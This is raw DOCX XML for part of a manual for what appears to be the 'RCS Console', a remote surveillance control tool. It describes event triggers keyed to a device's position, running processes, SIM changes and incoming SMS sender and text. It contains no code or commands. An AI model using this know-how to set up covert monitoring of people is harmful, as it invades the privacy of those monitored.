          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Latitude</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="001C7768">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the latitude coordinate.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Longitude</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="001C7768">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the longitude coordinate.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C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Distance</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00B765C9">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the range from latitude and longitude coordinates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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29138B" w:rsidTr="0029138B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1240" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:211.5pt;z-index:251837440;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId263" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1240" DrawAspect="Content" ObjectID="_1446455381" r:id="rId264"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.10</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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(Process)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A8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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="0029138B" w:rsidRDefault="0029138B" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (2</w:t>
            </w:r>
            <w:r w:rsidR="00E8433A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) is the </w:t>
            </w:r>
            <w:r w:rsidR="001774A1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type of process identification (name or window title).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00E838E1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidR="002A549D">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the </w:t>
            </w:r>
            <w:r w:rsidR="00E838E1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>process name or window title (wildcards allowed).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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29138B" w:rsidTr="0029138B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1242" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:169.5pt;z-index:251839488;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId265" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1242" DrawAspect="Content" ObjectID="_1446455382" r:id="rId266"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.11</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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(SimChange)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A8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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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29138B" w:rsidTr="00127C42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1245" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:203.25pt;z-index:251845632;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId267" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1245" DrawAspect="Content" ObjectID="_1446455383" r:id="rId268"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.12</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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(Sms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A8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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="0029138B" w:rsidRDefault="0029138B" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="red"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidR="0096198C">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the </w:t>
            </w:r>
            <w:r w:rsidR="00526E66">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>message sender’s phone number.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="007E3083">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Text</w:t>
            </w:r>
            <w:r w:rsidR="007E3083">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the text of the message (or part of it) that must match.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="0029138B">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29138B" w:rsidTr="00127C42">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1246" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:160.5pt;z-index:251847680;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId269" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1246" DrawAspect="Content" ObjectID="_1446455384" r:id="rId270"/>
              </w:object>
            </w:r>
          </w:p>
